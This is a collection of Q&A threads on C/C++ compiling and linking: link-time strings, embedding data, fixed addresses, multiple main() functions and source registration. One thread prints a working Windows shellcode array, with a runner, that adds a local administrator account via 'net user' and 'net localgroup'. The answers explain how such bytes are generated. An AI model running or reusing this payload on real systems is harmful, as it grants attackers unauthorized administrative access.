Insert string at linking time


I want to define an external global symbol (const char*) used by the program and add the symbol at link time with a given value. This is useful, for example, for a commit hash or build time.
I found --defsym, which does something else. The Go linker supports this functionality via the -X option. (Yes, I know Go strings are managed, but I am talking about plain old zero-terminated C strings.)
For example:
extern const char *git_commit;
int main(int argc, char *argv[]) {
puts(git_commit);
return 0;
}
gcc main.o -Wl<something here that adds git_commit and set it to '84e5...'>
I am aware of the config.h approach and of building object files containing those strings. But it's 2019 by now. Such a simple task should be easy.
Edit: a more precise question:
Is there an equivalent option in gcc/binutils for the Go linker's -X option?

You can do it at compile/preprocessing time; consider this:
#include <stdio.h>
const char * git_commit = GIT_COMMIT;
int main(int argc, char ** argv) {
puts(git_commit);
return 0;
}
and in command line:
gcc -o test test.c -DGIT_COMMIT="\"This is a test\""
assuming you are using the GCC compiler.
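If escaping the quotes on the command line gets awkward, one variation is to pass the bare value and let the preprocessor add the quotes. The following is only a sketch: the helper macros STRINGIFY and STRINGIFY_IMPL, the fallback value unknown, and the function have_commit are assumptions for illustration, not part of the answer above.

```cpp
#include <cstring>

// Fallback so the file still compiles when -DGIT_COMMIT=... is not given.
#ifndef GIT_COMMIT
#define GIT_COMMIT unknown
#endif

// Two-level expansion: the outer macro expands GIT_COMMIT first,
// the inner one turns the result into a string literal.
#define STRINGIFY_IMPL(x) #x
#define STRINGIFY(x) STRINGIFY_IMPL(x)

const char* git_commit = STRINGIFY(GIT_COMMIT);

// Hypothetical helper: reports whether a real value was passed at build time.
bool have_commit() {
    return std::strcmp(git_commit, "unknown") != 0;
}
```

With this, something like gcc -DGIT_COMMIT=$(git rev-parse --short HEAD) needs no nested quoting. It should work for values such as hexadecimal hashes; values containing spaces or punctuation will probably still need explicit quotes.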

One way:
echo "char const* git_commit = \"$(git rev-parse HEAD)\";" > git_commit.c
gcc -c -o git_commit.o git_commit.c
gcc -o main main.o git_commit.o
When you implement this in a makefile, you may want to recreate git_commit.c only when the revision changes, so that the program is not relinked on each make invocation.

I'm not aware of any way to do what you're seeking to do directly via a flag using one of the commonly used linkers. In general, if you want to link the definition of such an object into your program, you'll have to provide an object file containing a suitable symbol definition.
Probably the simplest way to get there is to invoke the compiler on the definition of your variable, with the content fed from a macro defined on the command line, as already suggested in the other answers. If you want to avoid creating temporary source files, gcc can also receive input straight from stdin:
echo "extern const char git_commit[] = GIT_COMMIT;" | gcc -DGIT_COMMIT=\"asdf\" -c -o git_commit.obj -xc++ -
(The extern in the definition is needed because the input is compiled as C++, where a const object at namespace scope otherwise has internal linkage and would not be visible to the linker.)
And in your code you just declare it as
extern const char git_commit[];
Note: I'm using const char git_commit[] rather than const char* git_commit. That way, git_commit will directly be an array of suitable size initialized to hold the contents of the commit hash. const char* git_commit, on the other hand, will create a global pointer object initialized to hold the address of a separate string literal object, which means you introduce an unnecessary indirection. Not that it will really matter here, but it also doesn't really cost you anything to skip the inefficiency, however tiny it might be…
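The difference between the two forms can be seen with sizeof. This is a small sketch only; the names commit_array and commit_pointer and the value "0123abc" are placeholders chosen for illustration.

```cpp
#include <cstddef>

// Array form: the characters themselves are the object,
// and the size is known at compile time.
const char commit_array[] = "0123abc";

// Pointer form: a separate pointer object that holds the
// address of a string literal stored elsewhere.
const char* commit_pointer = "0123abc";

// sizeof on the array counts the 7 characters plus the terminating '\0'.
constexpr std::size_t array_bytes = sizeof(commit_array);

// sizeof on the pointer is just the size of a pointer on the target.
constexpr std::size_t pointer_bytes = sizeof(commit_pointer);
```

One practical consequence: code that sees only the declaration extern const char git_commit[]; cannot use sizeof on it, because the array bound is not visible there, so strlen is still needed in other files.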
There would also be the objcopy utility which can be used to wrap arbitrary binary content in an object file, see, e.g., here How do I embed the contents of a binary file in an executable on Mac OS X? It may even be possible to pass input to objcopy straight via stdin as well. Finally, you could also just write your own tool that directly writes an object file containing a suitable symbol definition. Consider, however, that, at the end of the day, you're seeking to generate an object file that can be linked with the other object files making up your program. Simply using the same compiler you use to compile the rest of the code is probably the most robust way of going about doing that. With other solutions, you'll always have to manually make sure that the object files are compatible in terms of target architecture, memory layout, …

You could embed it as a resource file, for example:
GitInfoHTML HTML "GitInfo.html"
This will be placed into the executable by the linker (at link time) and can then be loaded.
For more info, see:
https://learn.microsoft.com/en-us/cpp/windows/resource-files-visual-studio?view=vs-2019

Related

Storing Enormous Static Variables in C++

I have a string of information that is roughly 17 kb long. My program will not generate this string or read it into a buffer - the data is already initialized, I want it to be compiled as is from within my code, like you would a static variable. Moreover, I'd much prefer it is within my executable, and not stored within a project file. I've never before encountered such an issue, what is the best way to go around this? Should I include as resource, or literally copy and paste the enormous stream of data into a variable? What would you recommend?
Forgot to mention, am using VisualStudio C++ 2015 if that matters

The GNU linker ld has the ability to directly include custom data as the .data section of an object file:
ld -r -b binary -o example.o example.txt
The resulting example.o file has symbols defined to access start and end of the embedded data (just look at the file with objdump to see how they're named).
Now I don't know whether the linker that comes with Visual Studio has a similar ability, but I guess you could use the GNU linker via MinGW or Cygwin (since the generated object file won't reference the standard library, you won't need the emulation library that comes with Cygwin). The resulting object file can apparently just be added to your project like a regular source file.
Of course this manual workflow isn't too good if the data changes often...
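The start and end symbols mentioned above could be consumed roughly as follows. This is a sketch under assumptions: the symbol names follow the pattern GNU ld typically derives from the input file name example.txt (check the real names with objdump or nm), and copy_embedded is a hypothetical helper.

```cpp
#include <string>

// Symbols that GNU ld is expected to generate for an input file named
// example.txt. They only resolve when example.o is linked in; merely
// declaring them is harmless.
extern "C" const char _binary_example_txt_start[];
extern "C" const char _binary_example_txt_end[];

// Copies the bytes between two boundary addresses into a std::string.
// The embedded data is not null-terminated, so the length comes from
// the distance between the two addresses.
std::string copy_embedded(const char* begin, const char* end) {
    return std::string(begin, end);
}
```

In a program linked against example.o, the call would be copy_embedded(_binary_example_txt_start, _binary_example_txt_end).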
Alternatively, you can write a simple program that puts the contents of the file into a C array (or string literal), like:
unsigned char const data[] = {
0x12, 0x34, 0x56 };
Of course there's already such a program (xxd, with its -i option), but I don't know whether it's available to you. One potential issue is that, with a string literal, you could reach the limit for the length of string literals. To get around that you could try a (multidimensional) char array.
(When writing this answer I found this blog post very helpful.)
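A generator of the kind described in this answer could look roughly like this. It is a minimal sketch, not a replacement for an existing tool; the function name to_c_array and the exact output layout are assumptions.

```cpp
#include <cstddef>
#include <cstdio>
#include <string>
#include <vector>

// Renders bytes as the source text of a C array definition.
// The array name is supplied by the caller.
std::string to_c_array(const std::string& name,
                       const std::vector<unsigned char>& bytes) {
    std::string out = "unsigned char const " + name + "[] = {";
    for (std::size_t i = 0; i < bytes.size(); ++i) {
        char hex[8];
        // Each byte becomes a two-digit hexadecimal literal such as 0x12.
        std::snprintf(hex, sizeof hex, "0x%02x",
                      static_cast<unsigned>(bytes[i]));
        if (i != 0) out += ", ";
        out += hex;
    }
    out += "};\n";
    return out;
}
```

A real tool would read the bytes from the input file, write the returned text to a .c or .cpp file as a build step, and probably emit a length constant as well.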

How is the shell code of a Buffer Overflow generated

The following code piqued my curiosity. I keep reading about and studying the exploit known as a "buffer overflow". I want to know how this code was generated, and how and why it runs.
char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"
"\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"
"\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"
"\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"
"\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"
"\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"
"\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"
"\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65"
"\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"
"\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7";
int main(int argc, char **argv){
int (*f)();
f = (int (*)())shellcode;(int)(*f)();
}
Thanks a lot fella's. ^_^

A simple way to generate such a code would be to write the desired functionality in C. Then compile it (not link) using say gcc as your compiler as
gcc -c shellcode.c
This will generate an object file shellcode.o. Now you can see the assembled code using objdump:
objdump -D shellcode.o
Now you can see the bytes corresponding to the instructions in your function.
Please remember, though, that this will work only if your shellcode doesn't call any other function and doesn't reference any globals or strings. That is because the linker has not yet been invoked. If you want all the functionality, I suggest you generate a shared binary (.so on *NIX and .dll on Windows) while exporting the required function. Then you can find the start point of the function and copy bytes from there. You will also have to copy the bytes of all other functions and globals, and you will have to make sure that the shared library is compiled as position-independent code.
Also as mentioned above this code generated is specific to the target and won't work as is on other platforms.

Machine code instructions have been entered directly into the C program as data, then called with a function pointer. If the system allows this, the assembly can take any action allowed to the program, including launching other programs.
The code is specific to the particular processor it is targeted at.

Can I get the address of a singleton during compile or link time from gcc?

I am working on an embedded project and wonder whether it is possible to get the address of a singleton class at compile or link time.
To create my singleton, I use the following code and would be interested in the address of instance.
class A
{
public:
static A& get()
{
static A instance;
return instance;
}
};
What I want to do, is of course changing the value from outside using a debug probe, but not using a real debug session.
Best regards
Andreas

Without significant knowledge of exactly what development tools, hardware architecture, etc. you are using, it's very hard to say exactly what you should do, but it's typically possible to assign certain variables to a specific data segment or functions to a specific code segment, and then in the linking phase assign a specific address to that segment.
For example you can use the gcc section attribute:
int init_data __attribute__ ((section ("INITDATA")));
or
MyObj obj __attribute__((section ("BATTERY_BACKED")));
and then use the same section name in a linker script that places it to the "right" address.
Most (reasonable) embedded toolchains will support this in some manner, but exactly how it is done varies quite a lot.
Another option is to use placement new:
MyObj *obj = new ((void *)0x11220000) MyObj(args);

Usually debug probes only see physical addresses while user applications only operate on virtual addresses, which change every time the application is loaded, so no linker trick will work. You didn't say which OS you use but I guess it's Linux. If so, you can do something like this: reserve a scratchpad memory area whose physical address you know and which is not used by the OS. For example, if your SoC has an embedded static memory, use that; if not, ask your local Linux expert how to reserve a page of RAM in the kernel memory configuration.
Then look at this article to understand how to map a physical address into the virtual memory space of your application:
how to access kernel space from user space(in linux)?
After getting the virtual address of the scratchpad area, your application can read and write whatever it wants there. The debug probe will be able to read and write the same area using the physical address.

You can use placement-new with a buffer whose address is available at compile or link time.
#include <new>
extern unsigned char placeA[];
class A {
public:
static A& get()
{
static A *p_instance;
if(!p_instance) {
p_instance = new(placeA) A();
}
return *p_instance;
}
};
unsigned char placeA[sizeof(A)] __attribute__ ((aligned (__BIGGEST_ALIGNMENT__)));

Not exactly sure if this is what you're trying to do, but using "-S" with gcc will stop everything after the compile stage. That way you can dive into the assembly code and evaluate your variables. Here is the man page excerpt:
If you only want some of the stages of compilation, you can use -x (or
filename suffixes) to tell gcc where to start,
and one of the options -c, -S, or -E to say where gcc is to stop. Note that
some combinations (for example, -x cpp-output -E) instruct gcc to do nothing at all.
-c Compile or assemble the source files, but do not link. The linking stage simply is not done. The ultimate
output is in the form of an object file for each source file.
By default, the object file name for a source file is made by replacing the suffix .c, .i, .s, etc., with .o.
Unrecognized input files, not requiring compilation or assembly, are ignored.
-S Stop after the stage of compilation proper; do not assemble. The output is in the form of an assembler code file
for each non-assembler input file specified.
By default, the assembler file name for a source file is made by replacing the suffix .c, .i, etc., with .s.
Input files that don't require compilation are ignored.
-E Stop after the preprocessing stage; do not run the compiler proper. The output is in the form of preprocessed
source code, which is sent to the standard output.
Input files which don't require preprocessing are ignored.

Two main functions

Can we have two main() functions in a C++ program?

The standard explicitly says in 3.6.1:
A program shall contain a global function called main, which is the designated start of the program. [...] This function shall not be overloaded.
So there can only be one main function in the global scope of a program. Functions in other scopes that are also called main are not affected by this; there can be any number of them.

Only one function can be named main outside of any namespace, just as for any other name. If you have namespaces foo and bar (etc) you can perfectly well have functions named foo::main, bar::main, and so on, but they won't be treated as anything special from the system's point of view (only the function named main outside of any namespace is treated specially, as the program's entry point). Of course, from your main you could perfectly well call the various foo::main, bar::main, and so on.

Yes! Why not?
Consider the following code:
namespace ps
{
int main(){return 0;}
}
int main()
{
ps::main();
}
It's ::main() that will be called during execution.

You can't overload main() in the global scope.

A program can only have one entry point, but of course that one main() function can call out to other functions, based on whatever logic you care to specify. So if you are looking for a way to effectively compile two or more programs into a single executable, you can do something like this:
int main(int argc, char ** argv)
{
if (argc > 0) // paranoia
{
if (strstr(argv[0], "frogger")) return frogger_main(argc, argv);
else if (strstr(argv[0], "pacman")) return pacman_main(argc, argv);
else if (strstr(argv[0], "tempest")) return tempest_main(argc, argv);
}
printf("Hmm, I'm not sure what I should run.\n");
return 10;
}
... then just rename your 'other' main() functions to frogger_main(), pacman_main(), or whatever names you care to give them, and you'll have a program that runs as Frogger if the executable name has the word 'frogger' in it, or runs as PacMan if the executable has the name 'pacman' in it, etc.
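The same dispatch can be written as a lookup table, which keeps the list of programs in one place. This is a sketch only: the Entry struct, the entries table, the dispatch function, and the stub bodies of frogger_main and pacman_main are assumptions for illustration.

```cpp
#include <cstring>

// Hypothetical stand-ins for the renamed main() functions of each program.
int frogger_main(int, char**) { return 1; }
int pacman_main(int, char**)  { return 2; }

// Maps a substring of the executable name to an entry function.
struct Entry {
    const char* name;
    int (*run)(int, char**);
};

const Entry entries[] = {
    {"frogger", frogger_main},
    {"pacman",  pacman_main},
};

// Runs the first entry whose name occurs in argv[0]; returns 10 if none
// matches, mirroring the fallback in the snippet above.
int dispatch(int argc, char** argv) {
    if (argc > 0 && argv[0] != nullptr) {
        for (const Entry& e : entries) {
            if (std::strstr(argv[0], e.name)) return e.run(argc, argv);
        }
    }
    return 10;
}
```

The real main would then just be int main(int argc, char** argv) { return dispatch(argc, argv); }, and the one executable can be installed under several names, for instance as copies or symbolic links.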

In one single program, only one entry point is allowed.

Ooh, trick question!
Short answer: "It depends."
Long answer: As others have pointed out, you can have multiple functions named main so long as they are in different namespaces, and only the main in the root namespace (i.e. ::main) is used as the main program. In fact, some threading libraries' thread classes have a method named main that the library user overrides with the code they want run in the thread.
Now, assuming you're not doing any namespace tricks, if you try to define ::main in two different .cpp files, the files themselves will both compile, however, the linker will abort since there are two definitions named main; it can't tell which to link.
(A question I have for the gurus out there: in C++, do the function definitions int main() {} and extern "C" int main() {} generate functions with the same signature? I haven't tried it myself.)
And now for the time you can have more than one ::main in your program's source: if one main is in a library (.a or .so file), and another is in your source (.o) files, the one in your sources wins and the one in the library is dropped, and linking succeeds unless there's some other problem! If you didn't write a main, the library's main would win. This is actually done in the support libraries that ship with lex and yacc; they provide a barebones main so you don't have to write one for a quick parser.
Which leads to an interesting application: providing a main with every library. My libraries tend to be small and focused, and so I put a main.cpp in every one with a main that is test or utility code for the library. For example, my shared memory library has a main that allows all the functions for managing shared memory to be called from the command line. Then I can test a variety of cases with a bash script. Anything that links in the shared memory library gets the test code for free, or can dispose of it simply by defining their own main.
EDIT: Just to make sure folks are clear on the concept, I'm talking about a build that looks like:
gcc -c -o bar_main.o bar_main.cpp
ar -r libbar.a bar_main.o
ranlib libbar.a
gcc -c -o foo_main.o foo_main.cpp
gcc -o foo foo_main.o -L. -lbar
In this example, the main in foo_main.o beats the main in bar_main.o. The standard doesn't define this behavior because they don't care. There's a lot of nonstandard things that people use anyway; Linux is an example with its use of C bitfields. ld has worked this way longer than I've known how to type.
Seriously, guys, feel free to strictly adhere to standards if you need to turn out least-common-denominator code. But if you have the luxury of working on a platform that can build lex and yacc programs, by all means, consider taking advantage of it.

There is only one entry point in the global scope.

Registering each C/C++ source file to create a runtime list of used sources

For a debugging and logging library, I want to be able to find, at runtime, a list of all of the source files that the project has compiled and linked. I assume I'll be including some kind of header in each source file, and the preprocessor __FILE__ macro can give me a character constant for that file, so I just need to somehow "broadcast" that information from each file to be gathered by a runtime function.
The question is how to elegantly do this, and especially whether it can be done from C as opposed to C++. In C++ I'd probably try to make a class with static storage to hold the list of filenames. Each header file would create a file-local static instance of that class, which on creation would append the __FILE__ pointer or whatever into the class's static data members, perhaps as a linked list.
But I don't think this will work in C, and even in C++ I'm not sure it's guaranteed that each element will be created.

I wouldn't do that sort of thing right in the code. I would write a tool which parsed the project file (vcproj, makefile or even just scan the project directory for *.c* files) and generated an additional C source file which contained the names of all the source files in some kind of pre-initialized data structure.
I would then make that tool part of the build process so that every time you do a build this would all happen automatically. At run time, all you would have to do is read that data structure that was built.

I agree with Ferruccio, the best way to do this is in the build system, not the code itself. As an expansion of his idea, add a target to your build system which dumps a list of the files (which it has to know anyway) to a C file as a string, or array of strings, and compile this file into your source. This avoids a lot of complication in the source, and is expandable, if you want to add additional information, like the version number from your source code control system, who built the executable, etc.
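The generated file suggested here might look roughly like the following. Everything in it is hypothetical: the file names in the array, the identifiers source_files and source_file_count, and the idea that the file is called something like source_list.cpp.

```cpp
#include <cstddef>

// Hypothetical content of a build-generated file. A build step would
// rewrite this array from the list of sources it already knows.
// extern gives the const objects external linkage in C++, so other
// translation units can declare and read them.
extern const char* const source_files[] = {
    "main.cpp",
    "logger.cpp",
    "util.cpp",
};

extern const std::size_t source_file_count =
    sizeof(source_files) / sizeof(source_files[0]);
```

The logging library would then declare the two names in a header and iterate over the array at run time, with no per-file registration code.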

There is a standard way on UNIX and Linux: ident. For every source file you create an ID tag, which is usually assigned by your version control system, e.g. SVN keywords.
Then, to find out the name and revision of each source file, you just use the ident command. If you need to do it at runtime, check out how ident does it; its source should be freely available.

There's no way to do it in C. In C++ you can create a class like this:
struct Reg {
Reg( const char * file ) {
StaticDictionary::Register( file );
}
};
where StaticDictionary is a singleton container for all your file names. Then in each source file:
static Reg regthisfile( __FILE__ );
You would want to make the dictionary a Meyers singleton to avoid order of creation problems.
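Put together, the registration scheme could look like this. It is a sketch under assumptions: the answer does not show StaticDictionary, so its storage (a vector of strings) and the accessor Files are invented here for illustration.

```cpp
#include <string>
#include <vector>

// Meyers singleton: the vector is created on first use, so it already
// exists when Register() runs during static initialization of any file.
class StaticDictionary {
public:
    static void Register(const char* file) { files().push_back(file); }
    static const std::vector<std::string>& Files() { return files(); }

private:
    static std::vector<std::string>& files() {
        static std::vector<std::string> instance;
        return instance;
    }
};

struct Reg {
    explicit Reg(const char* file) { StaticDictionary::Register(file); }
};

// One such line per source file; static gives each file its own object.
static Reg regthisfile(__FILE__);
```

One caveat worth checking on your toolchain: if an object file comes from a static library and nothing else in it is referenced, the linker may leave it out, and its registration then never runs.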

I don't think you can do this in the way you outline in a "passive" mode. That is, you are going to somehow run code for each source file to be added to the registry, it's hard to get it to happen automatically.
Of course, it's possible that you can make that code very unobtrusive using macros. It might be problematic for C source files that don't have an "entrypoint", so if your code isn't already organised as "modules", with e.g. an init() function for each module, it might be hard. Static initializing code might be possible, I'm not 100% sure if the order in which things are initialized creates problems here.
Using static storage in the registry module sounds like an excellent idea, a plain linked list or simple hash table should be easy enough to implement, if your project doesn't already include any general-purpose utility library.

In C++ your solution will work. It's guaranteed.
Edit: Just thought of a solution: change a rule in your makefile to add
'-include "cfiles_register.h"' to each 'g++ file.cpp'.
%.o : %.cpp
$(CXX) -include 'cfiles_register.h' -c -o $@ $<
Put the implementation you proposed in the question into that 'cfiles_register.h'.

Using static instances in C++ would work fine.
You could do this also in C, but you need to use runtime specific features - for MSVC CRT take a look at http://www.codeguru.com/cpp/misc/misc/threadsprocesses/article.php/c6945/
For C - you could do it with a macro - define a variable named corresponding to your file, and then you could scan the symbols of your executable, just as an idea:
#define TRACK_FILE(name) char _file_tracker_##name;
use it in your my_c_file.c like this:
TRACK_FILE(my_c_file_c)
and then grep all file/variable names from the binary like this
nm my-binary | grep _file_tracker
Not really nice, but...

Horrible idea, I'm sure, but use a singleton. And on each file do something like
Singleton.register(__FILE__);
at global scope. It'll only work on cpp files though.
I did something like this years ago as a novice, and it worked. But I'd cringe to do it now. I'd add a build step now.

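I agree with those who say that it is better to avoid doing this at run time, but in C++ you can initialize a static variable with a function call (standard C requires constant initializers for static variables, so this does not compile as C), that is, in every file:
static int doesntmatter = register_file( __FILE__);
where register_file is your own registration function (register itself is a reserved keyword).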
